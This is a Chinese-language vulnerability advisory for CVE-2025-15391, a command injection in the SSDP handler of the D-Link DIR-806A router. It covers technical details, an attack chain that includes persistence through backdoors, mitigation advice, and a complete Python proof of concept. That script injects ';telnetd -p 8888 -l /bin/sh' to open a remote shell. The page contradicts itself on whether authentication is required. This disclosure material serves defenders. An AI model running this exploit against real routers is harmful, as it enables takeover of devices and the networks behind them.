D-Link DIR-806A SSDP服务命令注入漏洞 (CVE-2025-15391)

漏洞信息

漏洞编号

CVE-2025-15391

漏洞类型

命令注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

D-Link DIR-806A 100CNb11

漏洞概述

CVE-2025-15391是D-Link DIR-806A 100CNb11路由器中存在的一个命令注入漏洞。该漏洞位于SSDP（简单服务发现协议）请求处理器的ssdpcgi_main函数中，攻击者可以通过构造恶意的SSDP请求来注入并执行任意系统命令。

SSDP是通用即插即用（UPnP）协议的核心组件，用于在局域网中发现和公告网络设备和服务。D-Link DIR-806A路由器默认启用了SSDP服务，这使得攻击者可以在同一网络环境中向目标设备发送特制的SSDP请求。由于漏洞存在于处理SSDP请求的函数中，攻击者可以在请求中嵌入系统命令，设备在解析和处理这些请求时会执行注入的命令。

该漏洞的危险性在于它可以通过网络远程利用，且只需要低权限账户即可发起攻击，无需用户交互。CVSS评分6.3分（中等严重程度），主要影响机密性、完整性和可用性三个方面，评级均为低。虽然该漏洞的CVSS评分处于中等水平，但由于D-Link DIR-806A是一款曾经广泛使用的家庭和小型办公路由器，其影响范围可能相当广泛。

值得注意的是，受影响的产品版本已经不再受D-Link官方支持，这意味着用户可能无法获得官方的安全更新和补丁。这进一步增加了该漏洞的潜在风险，因为用户需要自行采取缓解措施来保护其设备安全。漏洞利用代码已经在公开渠道可得，这降低了攻击者的利用门槛，使得即使是技术能力有限的攻击者也可能成功利用此漏洞。

技术细节

D-Link DIR-806A路由器在处理SSDP请求时存在命令注入漏洞。漏洞位于ssdpcgi_main函数中，该函数负责处理来自客户端的SSDP NOTIFY和M-SEARCH请求。

SSDP协议使用HTTP类消息格式，通过UDP协议在1900端口进行通信。当路由器接收到SSDP请求时，ssdpcgi_main函数会解析请求头中的特定字段，如LOCATION、NT（Notification Type）和USN（Unique Service Name）等。问题在于，该函数在解析这些字段时未对用户输入进行充分的输入验证和命令边界过滤。

攻击者可以在SSDP请求的NOTIFY消息中构造恶意的LOCATION字段或NT字段，嵌入shell元字符和系统命令。例如，在字段值中插入分号（;）或管道符（|）等命令分隔符，后跟需要执行的系统命令。当路由器解析这些字段并将其传递给系统命令执行函数（如system()或popen()）时，注入的命令将被执行。

由于漏洞存在于网络服务处理逻辑中，攻击者只需在目标设备的局域网内即可发起攻击。攻击者可以是同一网络中的任何设备，包括受控的物联网设备、恶意软件感染的计算机或其他路由器。攻击过程不需要任何认证，只需要发送特制的UDP数据包到目标设备的1900端口即可。

成功利用此漏洞后，攻击者可以在路由器上执行任意系统命令，从而完全控制设备。这允许攻击者修改路由器配置、监听网络流量、安装后门或将其作为僵尸网络的一部分。考虑到路由器在网络中的网关角色，控制路由器意味着攻击者可以进一步攻击网络中的其他设备。

攻击链分析

STEP 1

步骤1：信息收集

攻击者识别目标网络中的D-Link DIR-806A路由器，确认其IP地址和SSDP服务（1900端口）是否可用。可以使用网络扫描工具如nmap进行探测。

STEP 2

步骤2：构造恶意SSDP请求

攻击者构造包含命令注入payload的SSDP NOTIFY消息。在NT或LOCATION字段中嵌入系统命令，使用分号、管道符或反引号等命令分隔符来注入额外命令。

STEP 3

步骤3：发送恶意数据包

通过UDP协议将构造的恶意SSDP消息发送到目标路由器的1900端口。由于SSDP使用多播地址，攻击者也可以发送NOTIFY消息到239.255.255.250:1900。

STEP 4

步骤4：漏洞触发

目标路由器的ssdpcgi_main函数接收到恶意请求后，解析包含payload的字段。由于缺乏输入验证，注入的命令被传递给系统命令执行函数。

STEP 5

步骤5：命令执行

注入的系统命令在路由器上以高权限执行。攻击者可以获得设备的完全控制权，可以执行任意操作如安装后门、修改配置或进一步横向移动。

STEP 6

步骤6：持久化控制

攻击者在成功执行初始命令后，通常会尝试建立持久性控制，如修改启动脚本、安装反向shell或创建后门账户，以便长期控制设备。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# CVE-2025-15391 PoC - D-Link DIR-806A SSDP Command Injection
# This PoC demonstrates command injection in the SSDP Request Handler

import socket
import sys
import random

def generate_ssdp_notify_with_payload(payload):
    """
    Generate malicious SSDP NOTIFY message with command injection payload
    """
    # SSDP NOTIFY message format
    notify_msg = f"NOTIFY * HTTP/1.1\r\n"
    notify_msg += f"HOST: 239.255.255.250:1900\r\n"
    notify_msg += f"NT: {payload}\r\n"
    notify_msg += f"USN: uuid:{random.randint(1000, 9999)}::upnp:rootdevice\r\n"
    notify_msg += f"NTS: ssdp:alive\r\n"
    notify_msg += f"Cache-Control: max-age=1800\r\n"
    notify_msg += f"SERVER: Linux/2.6 UPnP/1.0 D-Link/1.0\r\n"
    notify_msg += "\r\n"
    return notify_msg

def send_ssdp_exploit(target_ip, target_port=1900, payload=";telnetd -p 8888 -l /bin/sh"):
    """
    Send exploit payload to target D-Link router via SSDP
    
    Args:
        target_ip: Target router IP address
        target_port: SSDP port (default 1900)
        payload: Command injection payload to execute
    
    Returns:
        bool: True if exploit sent successfully
    """
    try:
        # Create UDP socket
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        sock.settimeout(5)
        
        # Generate malicious SSDP NOTIFY message
        ssdp_message = generate_ssdp_notify_with_payload(payload)
        
        # Send to target
        sock.sendto(ssdp_message.encode(), (target_ip, target_port))
        
        print(f"[+] Exploit payload sent to {target_ip}:{target_port}")
        print(f"[+] Payload: {payload}")
        print(f"[+] Message:\n{ssdp_message}")
        
        sock.close()
        return True
        
    except Exception as e:
        print(f"[-] Error sending exploit: {str(e)}")
        return False

def main():
    if len(sys.argv) < 2:
        print("Usage: python3 cve-2025-15391.py <target_ip> [payload]")
        print("Example: python3 cve-2025-15391.py 192.168.0.1 ';telnetd -p 8888 -l /bin/sh'")
        print("\nNote: This PoC is for educational and authorized testing purposes only.")
        sys.exit(1)
    
    target_ip = sys.argv[1]
    payload = sys.argv[2] if len(sys.argv) > 2 else ";telnetd -p 8888 -l /bin/sh"
    
    print(f"[*] CVE-2025-15391 - D-Link DIR-806A SSDP Command Injection")
    print(f"[*] Target: {target_ip}")
    print(f"[*] Exploiting SSDP service on port 1900...")
    
    send_ssdp_exploit(target_ip, 1900, payload)

if __name__ == "__main__":
    main()

影响范围

D-Link DIR-806A 100CNb11 (所有版本)

D-Link DIR-806A 固件版本 < 停止维护前最新版本

防御指南

临时缓解措施

由于D-Link官方已停止对DIR-806A的支持，无法获得官方安全补丁。建议采取以下临时缓解措施：首先，在网络边界阻断对路由器1900端口的访问，防止外部攻击者利用SSDP协议发起攻击；其次，如果路由器管理界面支持，尝试禁用SSDP/UPnP服务；再次，考虑更换为仍在支持周期内的路由器设备；最后，实施网络分段策略，将路由器置于独立的网络区域，限制攻击成功后的横向移动风险。同时建议监控网络流量，关注是否有异常的SSDP请求模式。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-15391
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-15391
3 Details https://www.cvedetails.com/cve/CVE-2025-15391/
4 VulDB https://vuldb.com/cve/CVE-2025-15391
5 Link https://github.com/ccc-iotsec/cve-/blob/D-Link/D-Link%20DIR-806A%E6%9C%AA%E6%8E%88%E6%9D%83RCE.md
6 Link https://vuldb.com/?ctiid.339152
7 Link https://vuldb.com/?id.339152
8 Link https://vuldb.com/?submit.727637
9 Link https://www.dlink.com/